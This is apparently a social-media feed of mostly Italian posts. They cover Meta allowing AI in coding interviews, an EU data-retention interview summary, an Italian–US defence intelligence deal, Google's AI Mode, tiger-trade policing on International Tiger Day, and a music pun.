In April, Zuckerberg expanded on this slightly on a podcast with Dwarkesh Patel, where he said that “sometime in the next 12 to 18 months, we’ll reach the point where most of the code that’s going towards [AI] efforts is written by AI.”

While it’s true that many tech companies have pushed software engineers to use AI in their work, they have been slower to allow new applicants to use AI during the interview process. In fact, Anthropic, which makes the AI tool Claude, has specifically told job applicants that they cannot use AI during the interview process. To circumvent that type of ban, some AI tools promise to allow applicants to secretly use AI during coding interviews.The topic, in general, has been a controversial one in Silicon Valley. Established software engineers worry that the next batch of coders will be more AI “prompters” and “vibe coders” than software engineers, and that they may not know how to troubleshoot AI-written code when something goes wrong.

“We're obviously focused on using AI to help engineers with their day-to-day work, so it should be no surprise that we're testing how to provide these tools to applicants during interviews,” a Meta spokesperson told 404 Media.




L’accordo tra ELT e L3Harris porta l’intelligence elettronica nel cuore dell’Europa. Ecco come

@Notizie dall'Italia e dal mondo

Un nuovo centro d’eccellenza per l’intelligence e la guerra elettronica nascerà in Italia. L3Harris Technologies, colosso statunitense della difesa e della sicurezza, ha siglato un accordo strategico con ELT Group, leader italiano




Le chiacchierate speciali di Epsilon - Marco Ciurcina ci parla di Privacy e data retention intervistato da @Stefano Morandi :verified:

A cosa serve l'Europa? A chiarire che i dati delle nostre comunicazioni non possono essere conservati senza limite di tempo e scopo. Ne parliamo con l'avvocato Marco Ciurcina, esperto di privacy, data retention e nuove tecnologie.

@Privacy Pride

Il video presenta una "chiacchierata speciale" di Epsilon con l'avvocato Marco Ciurcina del Foro di Torino, esperto in nuove tecnologie e privacy [00:02]. L'argomento principale della discussione è la data retention, ovvero la conservazione dei dati e dei metadati delle comunicazioni [01:57].
Contesto storico e normativo della data retention:
• Eventi scatenanti: La discussione prende il via dagli attentati dell'11 settembre e quelli successivi a Madrid e Londra, che hanno spostato l'attenzione sulla sicurezza, talvolta a scapito della privacy [01:14].
• Direttive UE iniziali: Questi eventi hanno portato alla creazione di direttive europee sulla data retention, focalizzandosi sulla conservazione dei dati telefonici, email, social e altre forme di comunicazione [01:45].
• Patriot Act e normativa europea: L'avvocato Ciurcina menziona il Patriot Act negli Stati Uniti e sottolinea come in Europa l'attenzione si sia concentrata sul bilanciamento tra il diritto alla riservatezza e l'esigenza di tutelare la sicurezza [03:17].
• Metadati: Vengono spiegati i metadati come l'insieme di informazioni che circondano una comunicazione (mittente, destinatario, orario, luogo, indirizzo IP), distinguendoli dal contenuto della comunicazione stessa [05:33].
• Direttiva 2002/58: Questa direttiva era sintetica ma chiara nel richiedere che le eccezioni alla non conservazione dei metadati fossero previste per legge e con proporzionalità [06:27].
• Direttiva Frattini (2006/24): Prevedeva un'ampia possibilità di conservazione dei dati, ma è stata dichiarata invalida dalla Corte di Giustizia per mancanza di proporzionalità [08:48].
• Situazione attuale in Europa: Oggi, ci sono norme nazionali molto diverse, alcune delle quali sono state dichiarate illegittime dalla Corte di Giustizia per non conformità con l'obbligo di proporzionalità [09:38].
Nuova consultazione della Commissione Europea:
• La Commissione Europea ha avviato una consultazione per proporre una nuova direttiva che regoli l'accesso e la conservazione dei dati (e metadati) da parte delle autorità.
• L'avvocato Ciurcina vede positivamente questo intervento legislativo comunitario, poiché c'è maggiore consapevolezza sul tema e l'obiettivo è un quadro normativo uniforme e rispettoso dei principi comunitari di bilanciamento dei diritti. La consultazione pubblica si è chiusa il 18 giugno [16:02].
Problemi e sfide della data retention in Italia:
• Sicurezza vs. privacy: La sicurezza è spesso percepita come un diritto superiore, mettendo in secondo piano la privacy.
• "Ascensori legislativi": Viene criticata la pratica di inserire in leggi non correlate (come quella sulla sicurezza degli ascensori) articoli che aumentano i tempi di ritenzione dei metadati (da 2 a 6 anni) per indagini su terrorismo e mafia. Questa pratica rende la conservazione a 6 anni di fatto lo standard per gli operatori.
• La speranza è che la nuova direttiva europea porti a termini di conservazione più brevi e consideri parametri come la situazione di contesto o il rischio territoriale [18:20].
Consapevolezza e responsabilità individuale:
• C'è una crescente consapevolezza sull'importanza di limitare la conservazione e di criptare le comunicazioni, ma anche sulla natura dei metadati e su come essi rivelino "con chi parlo, quando ci parlo, da dove ci parlo".
• Quando si usano servizi gratuiti, "il guadagno del fornitore del servizio sono i nostri dati".
• L'importanza di utilizzare tecnologie e servizi che offrono garanzie più alte, come il software libero o servizi distribuiti (es. Mastodon), che non accentrano il controllo dei dati nelle mani di pochi.
• Le nuove generazioni sono più consapevoli di questi aspetti [26:50].
Impatto del GDPR e del quadro normativo europeo:
• Il GDPR è un modello normativo di successo, copiato globalmente, che ha imposto ai fornitori di servizi di adeguarsi, ad esempio permettendo di sapere dove sono localizzati i propri dati.
• Tuttavia, il GDPR non regola la data retention per finalità di indagine penale (regolata dalla direttiva 2016/680) né la sicurezza nazionale, che ha eccezioni specifiche.
• Nonostante le eccezioni, il quadro giuridico europeo (es. Convenzione Europea dei Diritti dell'Uomo) prevede limiti anche per i trattamenti di dati per sicurezza nazionale, richiedendo proporzionalità.
• A differenza degli Stati Uniti, dove la sorveglianza di massa sugli stranieri è più permessa, in Europa la sorveglianza di massa indiscriminata non è consentita senza violare le norme [36:52].
• Le recenti normative europee come il Data Services Act, Data Market Act e AI Act stanno mettendo in discussione il "capitalismo della sorveglianza", introducendo il concetto di "rischio sistemico" e imponendo responsabilità alle grandi piattaforme.
Partecipazione e conclusione:
• L'avvocato menziona la sua collaborazione con associazioni come Humans, che si occupano di sensibilizzazione su questi temi.
• Viene ribadito l'invito a partecipare attivamente alla consultazione pubblica dell'Unione Europea, che è accessibile a tutti [43:16].
• Il video si conclude ribadendo l'importanza di essere consapevoli di come i nostri dati vengano trattati, dato che le interazioni digitali sono quotidiane e costanti.


Qui il video completo

reshared this



AI Mode, ecco le nuova trovata di Google per affossare i giornali

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Google lancia nel Regno Unito la modalità “AI Mode”, che fornisce risposte dirette senza link a siti web, segnando un cambiamento radicale rispetto ai tradizionali “10 link blu”. L'articolo del Daily



Mediterraneo allargato, Italia e Stati Uniti. Il tempo delle scelte strategiche secondo Volpi

@Notizie dall'Italia e dal mondo

Il Mediterraneo non è una periferia. Non è una cerniera passiva tra l’Europa e il resto del mondo, né un’area da presidiare a distanza con droni e satelliti. Il Mediterraneo è uno spazio vivo, mutevole, attraversato da rotte storiche e tensioni contemporanee, in cui si incrociano




Oggi 29 luglio è la giornata mondiale della tigre. La caccia illegale e il commercio di parti (pelle, ossa e organi) rappresentano la minaccia più grave per la sua sopravvivenza. Come può intervenire la cooperazione internazionale di polizia


Lo sviluppo umano, come l'espansione dell'agricoltura, l'urbanizzazione e le infrastrutture, sta riducendo e frammentando gli habitat naturali delle tigri, limitando il loro spazio vitale. Quando le tigri entrano in contatto con le comunità umane, possono verificarsi attacchi a persone e bestiame, portando a ritorsioni e uccisioni da parte degli esseri umani.

Le tigri possono essere vulnerabili a malattie trasmesse dagli animali domestici, come cani e bestiame, presenti nelle aree circostanti i loro habitat. Alcune popolazioni di tigri hanno una bassa diversità genetica a causa di piccole dimensioni e isolamento, il che le rende più vulnerabili a malattie e cambiamenti ambientali.

I cambiamenti climatici, come l'aumento delle temperature e la modifica dei regimi di pioggia, possono influenzare negativamente gli habitat e le prede delle tigri.

La conservazione delle tigri richiede sforzi coordinati a livello internazionale per affrontare queste minacce e proteggere i loro habitat naturali.

Le tigri, insieme ad altri grandi felini, siano oggetto di una pressione crescente per il commercio delle loro parti, in particolare le ossa, principalmente destinate all'uso medicinale in Asia. Sebbene le ossa di tigre siano la materia prima più ricercata, vi è una crescente preoccupazione per la sostituzione con ossa di altri grandi felini, come leoni e giaguari, sia per aumentare l'offerta, sia per aggirare le normative.

Un aspetto cruciale per la tutela delle tigri riguarda lo sviluppo di operazioni di allevamento in cattività. Dal 1990, si è assistito a un aumento di queste strutture, create in parte per rispondere alla diminuzione delle tigri selvatiche e all'inasprimento delle restrizioni sul commercio internazionale di specie provenienti da fonti selvatiche. Sebbene il commercio internazionale di parti provenienti da allevamenti in cattività sia generalmente permesso dalla #CITES (Convenzione sul commercio internazionale delle specie minacciate di estinzione), con requisiti regolatori diversi rispetto al commercio da fonti selvatiche, le parti contraenti CITES hanno mantenuto una posizione precauzionale e restrittiva riguardo al commercio di tigri provenienti da allevamenti in cattività per scopi commerciali. Le preoccupazioni principali riguardano i rischi per le popolazioni selvatiche che potrebbero derivare dalla legalizzazione dei mercati di destinazione.

È stata osservata una fuoriuscita di ossa da allevamenti di tigri per alimentare il mercato medicinale, spesso in violazione delle leggi nazionali. Per quanto riguarda i leoni, il Sudafrica ha permesso l'esportazione legale di scheletri di leone verso il Sud-Est asiatico, derivanti da popolazioni in cattività legate all'industria della caccia sportiva. Tuttavia, questo mercato è ora sospeso e il governo sudafricano ha manifestato l'intenzione di porre fine all'industria di allevamento di leoni in cattività. La sospensione di queste esportazioni legali solleva il rischio di un aumento del traffico di ossa provenienti da fonti captive.

I documenti sottolineano la persistenza dei mercati di destinazione per le parti di grandi felini e indicano che, anche se la produzione di prodotti medicinali avviene prevalentemente nei paesi consumatori, c'è un potenziale aumento della lavorazione delle ossa più vicino alla fonte, creando paste o colle. Questa innovazione nel traffico rappresenta un rischio da monitorare attentamente per le tigri e altre specie.

Pertanto, gli aspetti chiave sono:


  • Controllo rigoroso degli allevamenti in cattività: Limitare la proliferazione non regolamentata e prevenire la fuoriuscita di parti di tigri dal mercato legale.
  • Contrastare la domanda di prodotti derivati da tigri: Attraverso campagne di sensibilizzazione e politiche che riducano l'uso di queste parti nella medicina tradizionale.
  • Monitorare e reprimere il traffico illegale: Sia dalle popolazioni selvatiche che dagli allevamenti in cattività.
  • Evitare la sostituzione con altre specie: Assicurarsi che le restrizioni sul commercio di parti di tigre non portino a un aumento del traffico di altre specie di grandi felini.


In definitiva, la necessità di preservare le tigri selvatiche richiede un approccio integrato che affronti sia la domanda di mercato che la gestione delle fonti di approvvigionamento, inclusa la rigorosa supervisione degli allevamenti in cattività.

Con riguardo alla cooperazione internazionale (inspecie di polizia) gli aspetti salienti riguardano:

  • Contrasto al bracconaggio e al commercio illegale:
    • Scambio di informazioni e intelligence tra le forze di polizia di diversi paesi per identificare e smantellare le reti di bracconaggio e traffico.
    • Operazioni congiunte di contrasto al bracconaggio e sequestro di prodotti illegali a base di tigre.
    • Rafforzamento della cooperazione doganale per impedire il contrabbando transfrontaliero.
  • Applicazione della legge e perseguimento dei criminali:
    • Armonizzazione e applicazione di leggi severe contro il bracconaggio e il commercio illegale di specie protette.
    • Condivisione di prove e prove forensi per perseguire i trafficanti a livello internazionale.
    • Formazione congiunta delle forze dell'ordine sulle tecniche di indagine e applicazione della legge.
  • Protezione degli habitat delle tigri:
    • Coordinamento transfrontaliero per la gestione e la protezione di aree protette condivise.
    • Scambio di conoscenze e migliori pratiche sulla conservazione degli habitat delle tigri.
    • Monitoraggio e sorveglianza congiunti delle aree di confine per prevenire l'intrusione e il bracconaggio.
  • Sensibilizzazione e coinvolgimento delle comunità locali:
    • Campagne di sensibilizzazione internazionali per ridurre la domanda di prodotti a base di tigre.
    • Programmi di sviluppo sostenibile per le comunità che vivono vicino agli habitat delle tigri.
    • Coinvolgimento delle comunità locali nella protezione e nella sorveglianza delle tigri.


Una cooperazione internazionale efficace, in particolare tra le forze di polizia, è essenziale per affrontare le minacce multidimensionali alla sopravvivenza delle tigri a livello globale.

#giornatainternazionaledellatigre

@Ambiente - Gruppo sulla sostenibilità e giustizia climatica

reshared this



Da un po' mi sto avvicinando alla musica classica. Ogni ascolto è una piacevole scoperta. L'altro giorno stavo ascoltando Beethoven e ho esclamato :" Oh mica Mahler!"
#Freddure #Dadsjoke @❄️🧊 Freddure 🧊❄️